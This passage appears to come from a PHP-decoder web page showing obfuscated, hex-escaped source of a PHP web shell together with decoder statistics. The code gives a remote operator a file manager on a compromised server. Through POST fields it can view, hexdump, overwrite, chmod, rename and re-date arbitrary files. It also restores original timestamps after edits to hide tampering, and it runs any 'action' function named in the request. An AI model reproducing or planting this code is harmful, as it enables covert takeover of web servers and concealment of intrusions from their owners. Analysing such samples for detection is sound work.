$gid["\156\x61\155\145"] = @filegroup($_POST["\166\141\164"]); } else { $gid = @posix_getgrgid(@filegroup($_POST["\166\141\x74"])); } echo "\x3c\163\160\141\156\76\x4e\x61\155\x65\72\x3c\x2f\163\x70\x61\156\x3e\40" . htmlspecialchars(@basename($_POST["\x76\x61\164"])) . "\x20\74\163\x70\x61\x6e\76\123\x69\172\145\x3a\74\57\x73\x70\141\x6e\76\40" . (is_file($_POST["\166\x61\164"]) ? beer_ViewSize(filesize($_POST["\166\x61\x74"])) : "\x2d") . "\40\74\x73\x70\x61\x6e\76\x50\145\x72\155\x69\163\163\x69\x6f\x6e\x3a\74\x2f\163\160\x61\156\x3e\40" . beer_PermsColor($_POST["\x76\141\x74"]) . "\40\74\x73\x70\x61\x6e\76\x4f\x77\x6e\x65\x72\x2f\x47\x72\157\x75\160\72\x3c\x2f\163\160\x61\156\x3e\x20" . $uid["\x6e\x61\155\x65"] . "\x2f" . $gid["\156\x61\x6d\x65"] . "\74\x62\x72\x3e"; echo "\74\x73\160\x61\156\x3e\x43\150\x61\x6e\147\x65\40\164\x69\x6d\145\x3a\74\57\x73\x70\141\x6e\x3e\x20" . date("\131\55\x6d\x2d\x64\40\x48\72\151\x3a\163", filectime($_POST["\166\x61\x74"])) . "\40\x3c\x73\160\x61\x6e\76\x41\143\143\x65\163\x73\x20\164\151\155\145\72\x3c\x2f\x73\x70\x61\x6e\76\40" . date("\x59\55\x6d\x2d\x64\40\110\x3a\x69\x3a\163", fileatime($_POST["\x76\141\x74"])) . "\40\74\163\160\141\x6e\76\115\157\144\151\146\x79\x20\x74\151\x6d\145\72\74\x2f\163\160\x61\x6e\76\x20" . date("\131\x2d\155\x2d\x64\40\x48\x3a\x69\72\163", filemtime($_POST["\166\141\x74"])) . "\x3c\142\x72\x3e\x3c\142\x72\x3e"; if (empty($_POST["\167\x61\164"])) { $_POST["\167\x61\164"] = "\x76\151\x65\x77"; } if (is_file($_POST["\x76\141\164"])) { $m = array("\126\x69\145\x77", "\110\x69\147\x68\x6c\151\x67\150\x74", "\x44\157\x77\156\154\157\x61\144", "\110\x65\170\x64\165\155\160", "\105\x64\151\164", "\103\x68\x6d\x6f\x64", "\x52\145\156\x61\155\x65", "\124\157\165\x63\x68"); } else { $m = array("\103\x68\x6d\x6f\x64", "\122\145\x6e\x61\x6d\145", "\x54\157\x75\x63\150"); } foreach ($m as $v) { echo "\x3c\141\x20\150\162\x65\x66\75\43\x20\157\156\143\x6c\151\x63\153\75\42\147\50\156\x75\154\x6c\x2c\156\x75\154\154\54\x27" . urlencode($_POST["\x76\x61\164"]) . "\47\54\x27" . strtolower($v) . "\x27\51\42\x3e" . (strtolower($v) == @$_POST["\x77\141\164"] ? "\74\142\x3e\133\x20" . $v . "\40\135\x3c\57\x62\x3e" : $v) . "\x3c\57\x61\x3e\40"; } echo "\x3c\142\x72\76\x3c\142\x72\76"; switch ($_POST["\167\x61\164"]) { case "\x76\x69\x65\167": echo "\x3c\x70\162\145\x20\x63\x6c\141\x73\x73\75\155\154\x31\x3e"; $fp = @fopen($_POST["\166\x61\x74"], "\x72"); if ($fp) { while (!@feof($fp)) { echo htmlspecialchars(@fread($fp, 1024)); } @fclose($fp); } echo "\74\57\x70\162\145\76"; break; case "\x68\x69\x67\x68\154\151\x67\150\x74": if (@is_readable($_POST["\x76\141\x74"])) { echo "\74\144\151\x76\x20\x63\154\x61\x73\163\75\155\154\61\40\163\164\171\x6c\x65\75\x22\142\x61\143\x6b\x67\162\157\165\x6e\144\x2d\x63\157\x6c\157\x72\72\40\43\145\x31\x65\61\x65\61\73\x63\157\154\x6f\162\x3a\142\x6c\x61\143\153\x3b\42\x3e"; $code = @highlight_file($_POST["\x76\141\164"], true); echo str_replace(array("\74\163\x70\x61\156\x20", "\x3c\57\163\160\x61\156\x3e"), array("\74\146\157\156\164\40", "\x3c\57\146\157\x6e\164\x3e"), $code) . "\x3c\x2f\144\151\166\76"; } break; case "\143\x68\155\x6f\144": if (!empty($_POST["\x78\x61\164"])) { $perms = 0; for ($i = strlen($_POST["\170\141\164"]) - 1; $i >= 0; --$i) { $perms += (int) $_POST["\170\141\164"][$i] * pow(8, strlen($_POST["\170\x61\x74"]) - $i - 1); } if (!@chmod($_POST["\166\x61\164"], $perms)) { echo "\x43\141\x6e\47\164\x20\x73\145\164\40\160\x65\x72\155\x69\x73\x73\x69\157\x6e\x73\41\x3c\x62\162\76\74\x73\143\x72\x69\x70\x74\76\x64\x6f\x63\x75\x6d\x65\156\x74\x2e\155\x66\x2e\x78\141\164\56\x76\141\x6c\x75\145\75\42\x22\x3b\x3c\x2f\x73\143\162\x69\x70\164\x3e"; } } clearstatcache(); echo "\74\x73\x63\x72\x69\160\x74\76\x78\141\x74\137\x3d\x22\42\x3b\x3c\57\163\x63\x72\x69\160\x74\76\74\146\157\x72\x6d\x20\157\156\x73\x75\142\x6d\151\x74\75\x22\147\50\156\x75\154\x6c\x2c\156\165\x6c\x6c\54\47" . urlencode($_POST["\166\141\x74"]) . "\47\x2c\156\x75\154\154\54\164\x68\151\x73\56\143\150\x6d\157\144\56\x76\x61\154\x75\x65\51\x3b\162\x65\x74\165\x72\156\x20\146\x61\154\x73\x65\73\42\76\74\x69\156\x70\x75\x74\40\x74\x79\x70\145\x3d\x74\145\x78\x74\40\x6e\141\155\x65\x3d\143\150\155\157\x64\40\x76\141\154\165\x65\x3d\x22" . substr(sprintf("\45\x6f", fileperms($_POST["\166\141\x74"])), -4) . "\42\x3e\x3c\x69\156\x70\x75\x74\40\x74\x79\x70\x65\75\x73\x75\142\x6d\x69\164\x20\166\141\154\x75\145\75\x22\76\76\42\x3e\x3c\57\146\157\x72\155\x3e"; break; case "\145\144\151\x74": if (!is_writable($_POST["\166\141\164"])) { echo "\x46\x69\x6c\x65\40\151\x73\x6e\x27\x74\40\167\x72\x69\x74\145\x61\142\154\145"; break; } if (!empty($_POST["\x78\x61\x74"])) { $time = @filemtime($_POST["\166\141\x74"]); $_POST["\x78\141\x74"] = substr($_POST["\x78\141\x74"], 1); $fp = @fopen($_POST["\166\x61\x74"], "\167"); if ($fp) { @fwrite($fp, $_POST["\170\x61\x74"]); @fclose($fp); echo "\123\x61\x76\145\x64\41\74\142\x72\x3e\74\163\x63\162\x69\160\164\x3e\x78\x61\x74\x5f\75\x22\x22\x3b\x3c\57\x73\143\162\151\x70\164\x3e"; @touch($_POST["\x76\141\164"], $time, $time); } } echo "\74\146\157\x72\x6d\40\x6f\x6e\163\165\142\x6d\x69\x74\75\42\x67\x28\156\x75\x6c\154\x2c\x6e\165\154\x6c\x2c\47" . urlencode($_POST["\x76\x61\x74"]) . "\x27\54\x6e\165\x6c\154\54\47\61\47\x2b\164\150\x69\163\x2e\x74\145\x78\x74\x2e\x76\141\x6c\x75\x65\51\73\162\x65\164\x75\162\156\40\x66\x61\154\163\x65\x3b\x22\x3e\x3c\164\x65\x78\x74\141\x72\x65\141\x20\156\x61\155\x65\75\164\x65\x78\164\40\143\x6c\141\x73\x73\75\142\151\x67\x61\162\x65\141\x3e"; $fp = @fopen($_POST["\x76\x61\x74"], "\x72"); if ($fp) { while (!@feof($fp)) { echo htmlspecialchars(@fread($fp, 1024)); } @fclose($fp); } echo "\74\x2f\x74\145\170\x74\x61\x72\145\x61\x3e\x3c\151\156\x70\x75\x74\x20\164\x79\x70\x65\75\163\165\142\155\151\x74\40\x76\141\x6c\165\x65\75\42\76\76\x22\76\74\57\x66\x6f\x72\x6d\76"; break; case "\150\145\x78\144\165\x6d\160": $c = @file_get_contents($_POST["\x76\x61\164"]); $n = 0; $h = array("\60\60\x30\60\60\x30\x30\x30\74\x62\x72\x3e", '', ''); $len = strlen($c); for ($i = 0; $i < $len; ++$i) { $h[1] .= sprintf("\x25\60\62\x58", ord($c[$i])) . "\40"; switch (ord($c[$i])) { case 0: $h[2] .= "\40"; break; case 9: $h[2] .= "\x20"; break; case 10: $h[2] .= "\x20"; break; case 13: $h[2] .= "\x20"; break; default: $h[2] .= $c[$i]; break; } $n++; if ($n == 32) { $n = 0; if ($i + 1 < $len) { $h[0] .= sprintf("\45\x30\x38\130", $i + 1) . "\x3c\142\x72\76"; } $h[1] .= "\74\x62\x72\x3e"; $h[2] .= "\xa"; } } echo "\x3c\164\141\x62\x6c\145\x20\143\145\154\154\163\160\x61\143\x69\x6e\147\x3d\x31\40\x63\145\x6c\154\160\141\144\x64\151\156\147\x3d\x35\40\142\147\x63\157\154\x6f\162\x3d\x23\62\62\x32\x32\x32\x32\76\x3c\x74\x72\x3e\x3c\x74\x64\40\x62\147\x63\157\x6c\x6f\x72\75\43\x33\x33\63\x33\63\63\76\74\163\x70\x61\156\40\163\x74\171\154\x65\x3d\x22\146\157\x6e\x74\55\x77\x65\x69\x67\x68\x74\72\40\x6e\157\162\x6d\x61\x6c\73\x22\x3e\74\x70\x72\x65\x3e" . $h[0] . "\x3c\x2f\x70\162\x65\76\74\57\x73\160\141\x6e\76\x3c\x2f\x74\144\76\74\x74\x64\40\142\x67\143\x6f\154\157\162\75\x23\62\x38\62\70\62\x38\76\x3c\x70\x72\x65\x3e" . $h[1] . "\x3c\57\160\x72\145\x3e\x3c\x2f\164\x64\x3e\74\x74\144\x20\142\x67\x63\157\x6c\157\x72\75\x23\x33\63\x33\x33\x33\63\76\74\x70\x72\145\76" . htmlspecialchars($h[2]) . "\74\x2f\x70\162\145\76\x3c\x2f\x74\144\x3e\x3c\57\164\162\x3e\74\x2f\164\141\142\x6c\x65\x3e"; break; case "\x72\145\156\141\155\x65": if (!empty($_POST["\x78\141\x74"])) { if (!@rename($_POST["\166\141\164"], $_POST["\x78\x61\x74"])) { echo "\103\141\156\47\x74\40\162\x65\156\x61\155\x65\x21\x3c\x62\162\76"; } else { die("\74\163\143\x72\x69\160\164\x3e\147\x28\x6e\165\154\x6c\54\156\x75\x6c\x6c\x2c\x22" . urlencode($_POST["\x78\141\164"]) . "\42\54\156\165\x6c\154\54\x22\42\x29\x3c\x2f\x73\x63\x72\x69\x70\164\x3e"); } } echo "\x3c\146\x6f\x72\x6d\40\157\x6e\x73\165\x62\x6d\151\164\x3d\x22\147\50\x6e\165\x6c\x6c\x2c\x6e\x75\154\154\54\47" . urlencode($_POST["\x76\x61\x74"]) . "\x27\x2c\156\165\x6c\154\54\x74\x68\151\163\x2e\x6e\x61\x6d\145\x2e\x76\141\x6c\165\145\x29\x3b\x72\145\164\x75\162\156\40\146\x61\x6c\x73\x65\x3b\42\76\x3c\x69\156\160\165\x74\40\164\171\x70\x65\x3d\x74\145\170\164\40\x6e\x61\x6d\x65\x3d\156\141\x6d\145\40\x76\141\154\x75\145\75\x22" . htmlspecialchars($_POST["\x76\141\164"]) . "\x22\x3e\x3c\151\x6e\x70\165\164\40\164\171\160\x65\75\163\x75\x62\155\x69\164\40\x76\x61\x6c\x75\x65\x3d\42\76\76\x22\x3e\x3c\57\x66\x6f\x72\155\x3e"; break; case "\x74\x6f\x75\x63\150": if (!empty($_POST["\170\141\164"])) { $time = strtotime($_POST["\170\x61\x74"]); if ($time) { if (!touch($_POST["\x76\141\x74"], $time, $time)) { echo "\106\x61\x69\154\41"; } else { echo "\x54\157\165\x63\150\x65\x64\x21"; } } else { echo "\102\141\144\x20\x74\x69\155\145\40\146\157\x72\x6d\141\x74\x21"; } } clearstatcache(); echo "\x3c\163\x63\162\x69\x70\164\76\170\x61\164\137\x3d\42\42\x3b\74\57\x73\143\162\151\160\x74\x3e\74\146\157\162\x6d\x20\157\156\163\165\x62\155\151\164\x3d\x22\x67\x28\x6e\x75\x6c\x6c\x2c\156\165\154\154\54\x27" . urlencode($_POST["\166\x61\164"]) . "\x27\x2c\x6e\165\154\154\54\x74\x68\x69\163\56\164\x6f\x75\143\150\56\166\x61\x6c\x75\x65\51\73\162\145\164\x75\x72\x6e\40\146\141\x6c\163\x65\x3b\x22\x3e\x3c\151\x6e\x70\x75\164\40\x74\171\160\x65\75\x74\145\x78\164\x20\x6e\141\155\x65\x3d\x74\157\x75\x63\x68\x20\166\x61\154\x75\145\75\x22" . date("\x59\55\155\55\x64\x20\110\x3a\151\72\x73", @filemtime($_POST["\x76\x61\164"])) . "\42\76\74\x69\x6e\x70\x75\164\40\x74\x79\160\x65\x3d\163\165\142\155\x69\x74\x20\166\141\x6c\165\x65\75\42\76\x3e\42\76\74\57\146\x6f\x72\155\x3e"; break; } echo "\x3c\57\144\x69\166\x3e"; beer_Footer(); } goto vPQjc; XRmTa: function BEER_setcookie($k, $v) { $_COOKIE[$k] = $v; if ($k == "\x61\x63\x74") { $v = base64_encode($v); } setcookie($k, $v); } goto YH0Lz; pOK6k: if (strtolower(substr(PHP_OS, 0, 3)) == "\x77\x69\156") { $os = "\x77\151\156"; } else { $os = "\x6e\151\x78"; } goto DucCl; cFBhY: if (!empty($_POST["\x61\x63\x74"]) && function_exists("\141\143\164\151\157\156" . $_POST["\x61\143\164"])) { call_user_func("\x61\143\164\x69\157\x6e" . $_POST["\141\143\164"]); } goto rgPx2; rgPx2: die;

Function Calls

None

Variables

None

Stats

MD5	4f52bd6943e790657947d915bcaeb673
Eval Count	0
Decode Time	123 ms

Find this useful? Enter your email to receive occasional updates for securing PHP code.

PHP Decode

Decoded Output download

Did this file decode correctly?

How would you describe this file?

Original Code

Function Calls

Variables

Stats